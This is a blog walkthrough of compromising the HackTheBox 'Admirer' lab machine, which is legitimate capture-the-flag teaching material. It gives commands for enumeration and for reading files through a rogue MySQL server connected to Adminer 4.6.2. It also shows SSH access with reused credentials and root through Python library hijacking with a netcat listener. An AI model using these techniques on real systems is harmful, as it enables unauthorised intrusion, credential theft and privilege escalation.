Admirer HackTheBox WalkThrough

Admirer Hackthebox walkthrough

This is Admirer HackTheBox Walkthrough. In this writeup, I have demonstrated step-by-step how I rooted Admirer HackTheBox machine. Let us know something about this machine. It is a Linux machine with IP address 10.10.10.187 and difficulty easy assigned by its maker.

Before starting, connect your PC with VPN and make sure your connectivity with admirer machine by pinging the IP 10.10.10.187. If all correct then start hacking. As usual, I started by scanning the box. Scanning give us an idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it helps in vulnerability scanning. Nmap (a port scanner) gave the following result:-

Scanning

$ nmap -sV -sC -oN admirer_scan 10.10.10.187

Nmap scan report during Admirer Hackthebox Walkthrough

Nmap revealed that ports 21, 22 and 80 are open. Vsftpd on port 21, SSH on port 22 and Apache2 web server on port 80 are running. Searched available public exploits for vsftpd 3.0.3 using searchsploit tool but no exploit is present for this version of vsftpd. Tried anonymous login to ftp using credential anonymous : anonymous but login failed. Left it here and moved forward for further enumeration. We have port 80 open so there may be some website hosted on apache2 web server which is running on this port. Ongoing to the URL http://10.10.10.187/, got a web page containing many number of images.

Admirer hackthebox website webpage

Tried to enumerate more on this page but got no hint. Even, page source did not give any proper hint to proceed further. Checked robots.txt file and got a disallowed folder named, admin-dir and a user named waldo. Added this user to my notes as it can be our potential user. The robots.txt file also gave hints about contacts and creds file inside admin-dir.

Robors.txt file of Admirer htb Webpage

Soon I got some hints about these important files, immediately FUZZED for these files assuming they may be text files.

$wfuzz -c -w /opt/SecLists-master/Discovery/Web-Content/big.txt --sc 200 -u http://10.10.10.187/admin-dir/FUZZ.txt -t 50

Fuzzing for txt file in admin-directory   of Admirer Hackthebox machine

Fuzzing revealed contacts.txt and credentials.txt. These files are present at URLs http://10.10.10.187/admin-dir/contacts.txt  & http://10.10.10.187/admin-dir/credentials.txt  respectively.

Listing the contents of contacts.txt file during Admirer hackthebox walkthrough
Listing the contents of credentials.txt file during Admirer hackthebox walkthrough

Both the files contains many credentials along with lots of potentials usernames and passwords. The useful credentials for us is FTP account creds because we have port no 21 open and ftp server is running on it. The FTP credential is ftpuser : %n?4Wz}R$tTF7.

Login to FTP Account

$ ftp 10.10.10.187

~ftpuser

~%n?4Wz}R$tTF7

Got two files dump.sql and html.tar.gz inside the ftp directory. Downloaded them on my local machine using mget ftp command, to enumerate them further.

ftp> ls

ftp> mget dump.sql html.tar.gz  //To download both files to local machine

ftp> pwd

Login to ftp account of user ftpuser using the enumerated password during admirer hackthebox walkthrough

After enumerating contents of all the downloaded files, got some useful information, which I have listed below.

Got information about database name from dump.sql file.

Dumping the content of dump.sql file

Got database username and password from db_admin.php file.

Database: admirerdb

Username: waldo

Password: Wh3r3_1s_w4ld0?

Dumping the content of db_admin.php file on screen

We have database credential. Since we do not have port 3306 open on admirer machine so, we cannot connect to database remotely. Perhaps, the database credential is useless till now. After properly reading the contents of the file, db_admin.php got some hints

// TODO: Finish implementing this or find a better open source alternative.

I just tried fuzzing to find names of some file using wfuzz with extensions php, txt and html.

$wfuzz -c -w /opt/SecLists-master/Discovery/Web-Content/big.txt -z list,php-txt-html --hc 403,404 -t 100 -u http://10.10.10.187/utility-scripts/FUZZ.FUZ2Z

Fuzzing using wfuzz for php, html and txt file in utility-scripts folder

Fuzzing listed three files namely adminer.php, info.php and phptest.php. After going to URL, http://10.10.10.187/utility-scripts/adminer.php found login panel of adminer (a remote Database Administration tools just like PhpMyAdmin written in php language) along with the installed version of Admirer Software, which is 4.6.2. Soon I get information of software and its version, immediately I searched for public exploit. After googling, admirer 4.6.2 exploit got this article in very first page of the search results. For more info on how this vulnerability works read above article.

A snippet on ‘how this exploit work’ is attached below.

Snippet to show how adminer 4.6.2 vulnerability  work
Image-src: foregenix.com

To exploit this vulnerability I did the following things: –

Configure MySQL Server

1. Installed MySQL server on my local machine (MySQL is present in Kali by default). In other distro, use below command to install.

$apt install default-mysql-server

2. Started MySQL service

$systemctl start mysql

3. Logged in into MySQL server through the default root credential which is username : root & password : ‘ ‘ [Blank]

$mysql -u'root'

4. Created a new user dkm through which anyone can access to this server remotely.

MariaDB [(none)]> CREATE USER 'dkm'@'%' IDENTIFIED BY 'mypassword';

5. Grant all privilege to the user dkm to access databases.

MariaDB [(none)]> GRANT ALL PRIVILEGES ON *.* TO 'dkm'@'%';

6. Reload all privileges.

MariaDB [(none)]> FLUSH PRIVILEGES;

7. Created database admirer and created a table test inside this database.

MariaDB [(none)]> create database admirer;

MariaDB [(none)]> use admirer;

MariaDB [admirer]> create table test(name varchar(255));

MariaDB [admirer]> exit;

8. Allowed remote hosts to connect to this sql server. We can allow remote connection by changing bind address to 0.0.0.0 instead of 127.0.0.1 in the file 50-server.cnf at directory /etc/mysql/mariadb.conf.d/.

9. Restart MySQL Server to apply the changes

$systemctl restart mysql

10. Confirmed the connectivity to the server by logging into the server through the user dkm and password mypassword.

$mysql -u'dkm' -p'mypassword' -h localhost

11. At last, logged in into adminer login panel through the creds of newly created users.

Configuring MySql Server on my local machine and creating new user to allow remote login during Admirer hacktheBox Walkthrough

Logged in into MySQL server through the adminer login panel located at URL http://10.10.10.187/utility-scripts/adminer.php by using the credentials as

System: MySQL

Server: 10.10.14.14 (My tun0 IP)

Username: dkm

Password: mypassword

Database: admirer

Login Panel of Adminer Web Interface in Admirer Hackthebox Walkthrough

After login, select SQL Command option on left pane.

Login Panel of Adminer Web Portal  after getting logged in.

Enter the following commands to load index.php file and click execute.

load data local infile '../index.php'

into table test

fields terminated by "/n"

For more info about load data, you can read here.

Entering SQL command to execute on Adminer Database during Admirer Hackthebox Walkthrough

After the command is successfully executed click, select on left pane to list the content of the loaded file.

Web Interface after getting successful execution of the SQL Command

After loading the file index.php, got the following contents. A snippet of the content is given below. 

Content of Index.php file loaded on screen

From above file extracted credential waldo: &<h5b~yK3F#{PaPB&dA}{H>

According to the above file, this credential looks to be for accessing admirer database. However, we do not have any port listening for database connection (confirmed through nmap scan). So tried this credential to login into SSH account of user waldo and successfully logged in. This happened because database credential is reused.

Gaining User Access

$ ssh [email protected]

~&<h5b~yK3F#{PaPB&dA}{H>

$ whoami && id

Login to admirer HackTheBox machine using SSH credential during walkthrough

Capture User Flag

$cat user.txt

User flag of Admirer Hackthebox captured buring walkthrough

Privilege Escalation

Finding PrivEsc Vector

$sudo -l command revealed that:

User waldo may run the following commands on admirer:

(ALL) SETENV: /opt/scripts/admin_tasks.sh

Alternatively, we can say user waldo may run admin_tasks.sh script as root.

Running Sudo -l command to see any special permission given to user waldo in Admirer hackthebox walkthrough

Since user waldo can run admin_tasks.sh script with root privilege therefore all the files or commands which are executed inside this script will also have the same level of privilege as root. The function backup_web() inside admin_tasks.sh calls backup.py file which is present inside /opt/scripts/ directory. So when we execute admin_tasks.sh, backup.py will also be executed as root. Since it is calling shutil library therefore there can be a chance of Python Library Hijacking.

So here, our privilege escalation vector can be via Python Library Hijacking. Check this article for more info about PLH.

backup_web() function of admin_task.sh file

Content of backup.py file

content of backup.py file

To perform python library hijacking and getting root shell I did the following things:

Started Netcat listener in one terminal

$nc -nvlp 1234

And ran the following command in other terminal

$ mkdir /tmp/ethicalhacs

$ nano /tmp/ethicalhacs/shutil.py

$ cat /tmp/ethicalhacs/shutil.py

$ sudo PYTHONPATH=/tmp/ethicalhacs /opt/scripts/admin_tasks.sh

Privilege Escalation In Admirer HacktheBox Walkthrough

~Choose an option: 6

We can see we have successfully escalated the privilege to admin by Python Library hijacking.

Capture Root Flag

$cat /root/root.txt

Root Flag captured during Admirer Hackthebox Walkthrough

This was how I rooted to Admirer HackTheBox machine. Thanks for reading this walkthrough. Learnt a lot after rooting this box. Hope you guys have also learnt some new things. Feel free to share your experience in the comment section. For any query and suggestion related to walkthrough, feel free to write us at [email protected].

Really like articles on ethicalhacs.com, you can now support us by buying us coffee.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am InfoSec Consultant in day and Bug Bounty Hunter & CTF player at night. Sometimes write walkthrough and other cyber security articles here. You can connect me at https://www.linkedin.com/in/deepakdkm/